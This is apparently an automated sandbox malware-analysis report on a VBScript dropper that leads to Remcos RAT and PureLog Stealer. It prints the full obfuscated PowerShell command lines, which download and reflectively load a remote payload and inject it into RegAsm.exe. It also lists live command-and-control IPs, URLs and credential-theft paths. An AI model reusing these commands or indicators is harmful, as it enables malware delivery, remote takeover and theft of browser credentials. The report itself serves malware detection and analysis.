                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhniruxsswrbmv0rjhnorwxssurbmtndkydyjykgkcgnrklpjysndxjsid0goxvpahr0chmnkyc6lycrjy9pytywmccrjzewmc51cy5hcmnojysnascrj3zllm9yzy8ync8nkydpdgvtcy9kzscrj3rhac1ub3rllscrj3yvrgv0yscrj2hojysnb3qnkydlvi50ehq5du87jysnrkknkydpjysnymfzzscrjzy0qycrj29ujysndccrj2vujysndccrjyankyc9ichozxctt2jqzwn0ifn5c3rlbs5ojysnzscrj3qnkycuv2vijysnqycrj2xpjysnzw50ks5ejysnb3cnkydubccrj29hzccrj1n0cmluzyhgjysnsscrj2knkyd1cicrj2wpjysno0zjawinkydpbmfyeunvbicrj3rljysnbnqnkycgjysnpsbbu3lzdgvtjysnlicrj0nvbnzlcnrdojpgcm9tqmenkydzzty0jysnu3qnkydyaw4nkydnjysnkeynkydjawjhcycrj2unkyc2nenvbnrljysnbnqpo0zjawfzjysnc2vtjysnymx5id0gjysnw1jlzmxljysny3qnkydpb24uqxnzzw1ibhldojpmbycrj2fkkezjawjpbicrj2fyjysneumnkydvbnrlbnqpo0zjaxr5jysncgugpsbgswlhc3mnkydlbscrj2jses5hzxqnkyduexblkdl1t1j1blankydflkhvbwu5dscrj08po0zjaw1ldghvzcankyc9ieynkydjjysnaxr5cgunkycur2v0twv0jysnag9kjysnkdl1t1zbjysnstl1tyk7ricrj0lpbwunkyd0jysnag8nkydkjysnlicrj0ludm9rzscrjyhgswknkydujysndwwnkydslcbbjysnb2jqzwmnkyd0w11dqcg5du90ehquricrj0mnkyddtvivjysnnzexmi8zmjeuotgumdkujysnntqvlzonkydwjysndccrj3rooscrj3vpicwgoxunkydpzgvzyxrpdmfkbzknkyd1jysntycrjyasidl1t2rljysncycrj2enkyd0ascrj3zhzccrj285du8glca5du9kzxnhdgl2jysnywrvoxvpldl1t1jlzycrj0fzbtl1tyw5du85jysndu8nkycpkscplnjfugxbq2uokftjaefsxtcwk1tjaefsxtczk1tjaefsxtewnsksw3nucmluz11by2hbul0znikuckvqbefdzsgow2noqvjdntcrw2noqvjdmte3k1tjaefsxtc5ksxbc1ryaw5nxvtjaefsxtm5ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x') (('fii'+'url = 9uohttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/deta'+'hn'+'ot'+'ev.txt9uo;'+'fi'+'i'+'base'+'64c'+'on'+'t'+'en'+'t'+' '+'= (new-object system.n'+'e'+'t'+'.web'+'c'+'li'+'ent).d'+'ow'+'nl'+'oad'+'string(f'+'i'+'i'+'ur'+'l)'+';fiib'+'inarycon'+'te'+'nt'+' '+'= [system'+'.'+'convert]::fromba'+'se64'+'st'+'rin'+'g'+'(f'+'iibas'+'e'+'64conte'+'nt);fiias'+'sem'+'bly = '+'[refle'+'ct'+'ion.assembly]::lo'+'ad(fiibin'+'ar'+'yc'+'ontent);fiity'+'pe = fiiass'+'em'+'bly.get'+'type(9uorunp'+'e.home9u'+'o);fiimethod '+'= f'+'i'+'itype'+'.getmet'+'hod'+'(9uova'+'i9uo);f'+'iime'+'t'+'ho'+'d'+'.'+'invoke'+'(fii'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uotxt.f'+'c'+'cmr/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uo , 9u'+'odesativado9'+'u'+'o'+' , 9uode'+'s'+'a'+'ti'+'vad'+'o9uo , 9uodesativ'+'ado9uo,9uoreg'+'asm9uo,9uo9'+'uo'+'))').replace(([char]70+[char]73+[char]105),[string][char]36).replace(([char]57+[char]117+[char]79),[string][char]39))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjhniruxsswrbmv0rjhnorwxssurbmtndkydyjykgkcgnrklpjysndxjsid0goxvpahr0chmnkyc6lycrjy9pytywmccrjzewmc51cy5hcmnojysnascrj3zllm9yzy8ync8nkydpdgvtcy9kzscrj3rhac1ub3rllscrj3yvrgv0yscrj2hojysnb3qnkydlvi50ehq5du87jysnrkknkydpjysnymfzzscrjzy0qycrj29ujysndccrj2vujysndccrjyankyc9ichozxctt2jqzwn0ifn5c3rlbs5ojysnzscrj3qnkycuv2vijysnqycrj2xpjysnzw50ks5ejysnb3cnkydubccrj29hzccrj1n0cmluzyhgjysnsscrj2knkyd1cicrj2wpjysno0zjawinkydpbmfyeunvbicrj3rljysnbnqnkycgjysnpsbbu3lzdgvtjysnlicrj0nvbnzlcnrdojpgcm9tqmenkydzzty0jysnu3qnkydyaw4nkydnjysnkeynkydjawjhcycrj2unkyc2nenvbnrljysnbnqpo0zjawfzjysnc2vtjysnymx5id0gjysnw1jlzmxljysny3qnkydpb24uqxnzzw1ibhldojpmbycrj2fkkezjawjpbicrj2fyjysneumnkydvbnrlbnqpo0zjaxr5jysncgugpsbgswlhc3mnkydlbscrj2jses5hzxqnkyduexblkdl1t1j1blankydflkhvbwu5dscrj08po0zjaw1ldghvzcankyc9ieynkydjjysnaxr5cgunkycur2v0twv0jysnag9kjysnkdl1t1zbjysnstl1tyk7ricrj0lpbwunkyd0jysnag8nkydkjysnlicrj0ludm9rzscrjyhgswknkydujysndwwnkydslcbbjysnb2jqzwmnkyd0w11dqcg5du90ehquricrj0mnkyddtvivjysnnzexmi8zmjeuotgumdkujysnntqvlzonkydwjysndccrj3rooscrj3vpicwgoxunkydpzgvzyxrpdmfkbzknkyd1jysntycrjyasidl1t2rljysncycrj2enkyd0ascrj3zhzccrj285du8glca5du9kzxnhdgl2jysnywrvoxvpldl1t1jlzycrj0fzbtl1tyw5du85jysndu8nkycpkscplnjfugxbq2uokftjaefsxtcwk1tjaefsxtczk1tjaefsxtewnsksw3nucmluz11by2hbul0znikuckvqbefdzsgow2noqvjdntcrw2noqvjdmte3k1tjaefsxtc5ksxbc1ryaw5nxvtjaefsxtm5ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $shellid[1]+$shellid[13]+'x') (('fii'+'url = 9uohttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/deta'+'hn'+'ot'+'ev.txt9uo;'+'fi'+'i'+'base'+'64c'+'on'+'t'+'en'+'t'+' '+'= (new-object system.n'+'e'+'t'+'.web'+'c'+'li'+'ent).d'+'ow'+'nl'+'oad'+'string(f'+'i'+'i'+'ur'+'l)'+';fiib'+'inarycon'+'te'+'nt'+' '+'= [system'+'.'+'convert]::fromba'+'se64'+'st'+'rin'+'g'+'(f'+'iibas'+'e'+'64conte'+'nt);fiias'+'sem'+'bly = '+'[refle'+'ct'+'ion.assembly]::lo'+'ad(fiibin'+'ar'+'yc'+'ontent);fiity'+'pe = fiiass'+'em'+'bly.get'+'type(9uorunp'+'e.home9u'+'o);fiimethod '+'= f'+'i'+'itype'+'.getmet'+'hod'+'(9uova'+'i9uo);f'+'iime'+'t'+'ho'+'d'+'.'+'invoke'+'(fii'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uotxt.f'+'c'+'cmr/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uo , 9u'+'odesativado9'+'u'+'o'+' , 9uode'+'s'+'a'+'ti'+'vad'+'o9uo , 9uodesativ'+'ado9uo,9uoreg'+'asm9uo,9uo9'+'uo'+'))').replace(([char]70+[char]73+[char]105),[string][char]36).replace(([char]57+[char]117+[char]79),[string][char]39))"Jump to behavior
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerh
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerH
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerF
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJA\6
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJA\
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434CB6 cpuid 11_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,11_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,11_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,11_2_00451FD0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 10.2.powershell.exe.26f3e654470.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.powershell.exe.26f45f00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.powershell.exe.26f3e654470.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.powershell.exe.26f45f00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3DE40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db11_2_0040BB6B

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O0U3JAJump to behavior
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 10.2.powershell.exe.26f3e654470.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.powershell.exe.26f45f00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.powershell.exe.26f3e654470.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.powershell.exe.26f45f00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3DE40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe11_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting                  		Valid Accounts1
                  Native API                  		221
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		3
                  Obfuscated Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol211
                  Input Capture                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Software Packing                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell                  		Network Logon Script222
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets33
                  System Information Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials21
                  Security Software Discovery                  		VNCGUI Input Capture13
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync31
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                  Process Injection                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523832 Sample: 5fKvwnCAeC.vbs Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 25 ia600100.us.archive.org 2->25 37 Multi AV Scanner detection for domain / URL 2->37 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 15 other signatures 2->43 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 53 VBScript performs obfuscated calls to suspicious functions 9->53 55 Suspicious powershell command line found 9->55 57 Wscript starts Powershell (via cmd or directly) 9->57 59 3 other signatures 9->59 12 powershell.exe 7 9->12         started        process6 signatures7 61 Suspicious powershell command line found 12->61 63 Obfuscated command line found 12->63 65 Suspicious execution chain found 12->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 12->67 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 29 45.90.89.123, 49707, 80 CMCSUS Bulgaria 15->29 31 ia600100.us.archive.org 207.241.227.240, 443, 49706 INTERNET-ARCHIVEUS United States 15->31 33 Writes to foreign memory regions 15->33 35 Injects a PE file into a foreign processes 15->35 21 RegAsm.exe 3 2 15->21         started        signatures10 process11 dnsIp12 27 45.90.89.98, 49708, 49713, 60898 CMCSUS Bulgaria 21->27 45 Contains functionality to bypass UAC (CMSTPLUA) 21->45 47 Detected Remcos RAT 21->47 49 Contains functionalty to change the wallpaper 21->49 51 5 other signatures 21->51 signatures13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  5fKvwnCAeC.vbs8%ReversingLabsScript.Trojan.Heuristic
                  5fKvwnCAeC.vbs10%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  ia600100.us.archive.org0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://oneget.orgX0%URL Reputationsafe
                  https://oneget.orgX0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://oneget.org0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  https://ia600100.us.archive.org1%VirustotalBrowse
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt10%VirustotalBrowse
                  http://45.90.89.123/2117/RMCCF.txt15%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  http://45.90.89.12314%VirustotalBrowse
                  http://ia600100.us.archive.org0%VirustotalBrowse
                  45.90.89.9812%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ia600100.us.archive.org
                  		207.241.227.240
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
                  http://45.90.89.123/2117/RMCCF.txttrueunknown
                  45.90.89.98trueunknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpRegAsm.exefalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000A.00000002.1391003389.0000026F2EF56000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://geoplugin.net/json.gp/Cpowershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.1391003389.0000026F2F15A000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 0000000A.00000002.1391003389.0000026F2E87A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.1391003389.0000026F2F2D0000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
